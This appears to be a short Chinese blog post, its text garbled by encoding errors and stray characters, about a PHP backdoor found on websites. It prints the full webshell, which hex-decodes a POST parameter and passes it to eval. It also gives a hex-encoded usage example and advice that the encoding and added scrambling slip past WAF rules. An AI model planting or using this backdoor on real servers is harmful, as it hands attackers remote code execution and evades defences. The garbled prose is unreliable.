朋友發(fā)現(xiàn)一個(gè)后門文件,讓我看看如何使用录粱。
使用了hex編碼進(jìn)行加密腻格,這樣完全可以過各種防護(hù)。如果防護(hù)加了規(guī)則啥繁,那就加點(diǎn)算法擾亂菜职,感覺通過正則WAF時(shí)代要過去了。旗闽。酬核。沒什么卵用,太難防御了宪睹。
gutou=706870696E666F28293B???phpinfo()
<?php
error_reporting(0);set_time_limit(0);
$GuTou=@$_POST["gutou"];
if($GuTou){
???$GuTou=str_replace(array("\n","\t","\r"),"",$GuTou);
???$cc="";for($i=0;$i<strlen($GuTou);$i+=2)
???$cc.=urldecode("%".substr($GuTou,$i,2));
???@eval($cc);exit;
}
?>
另外一個(gè)網(wǎng)站發(fā)現(xiàn)這樣的代碼:
$GuTou=@$_POST["gutou"];
if($GuTou){
???$GuTou=str_replace(array("\n","\t","\r"),"",$GuTou);
???$cc="";for($i=0;$i<strlen($GuTou);$i+=2)
???$cc.=urldecode("%".substr($GuTou,$i,2));
???@eval($cc);exit;